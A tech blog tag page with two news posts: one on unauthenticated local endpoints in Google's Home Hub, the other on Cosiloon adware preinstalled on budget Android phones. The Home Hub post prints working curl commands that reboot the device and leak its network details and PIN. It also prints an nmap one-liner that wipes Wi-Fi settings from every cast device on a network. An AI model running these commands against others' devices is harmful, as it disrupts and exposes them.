All posts in “xml”

The Google Home Hub is deeply insecure

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and allows you to see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its pin), and accepts commands remotely (including a quick reboot via the command line).

The command – which consists of a simple URL call via the command line – is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

Other one-liners expose further data, including a number of micro services:

$ curl -s http://hub:8008/setup/eureka_info | jq
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process.

nmap --open -p 8008 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.

Some low-cost Android phones shipped with malware built in

Avast has found that many low-cost, non-Google-certifed Android phones shipped with a strain of malware built in that could send users to download apps they didn’t intend to access. The malware, called called Cosiloon, overlays advertisements over the operating system in order to promote apps or even trick users into downloading apps. Devices effected shipped from ZTE, Archos and myPhone.

The app consists of a dropper and a payload. “The dropper is a small application with no obfuscation, located on the /system partition of affected devices. The app is completely passive, only visible to the user in the list of system applications under ‘settings.’ We have seen the dropper with two different names, ‘CrashService’ and ‘ImeMess,’” wrote Avast. The dropper then connects with a website to grab the payloads that the hackers wish to install on the phone. “The XML manifest contains information about what to download, which services to start and contains a whitelist programmed to potentially exclude specific countries and devices from infection. However, we’ve never seen the country whitelist used, and just a few devices were whitelisted in early versions. Currently, no countries or devices are whitelisted. The entire Cosiloon URL is hardcoded in the APK.”

The dropper is part of the system’s firmware and is not easily removed.

To summarize:

The dropper can install application packages defined by the manifest downloaded via an unencrypted HTTP connection without the user’s consent or knowledge.
The dropper is preinstalled somewhere in the supply chain, by the manufacturer, OEM or carrier.
The user cannot remove the dropper, because it is a system application, part of the device’s firmware.

Avast can detect and remove the payloads and they recommend following these instructions to disable the dropper. If the dropper spots antivirus software on your phone it will actually stop notifications but it will still recommend downloads as you browse in your default browser, a gateway to grabbing more (and worse) malware. Engadget notes that this vector is similar to the Lenovo “Superfish” exploit that shipped thousands of computers with malware built in.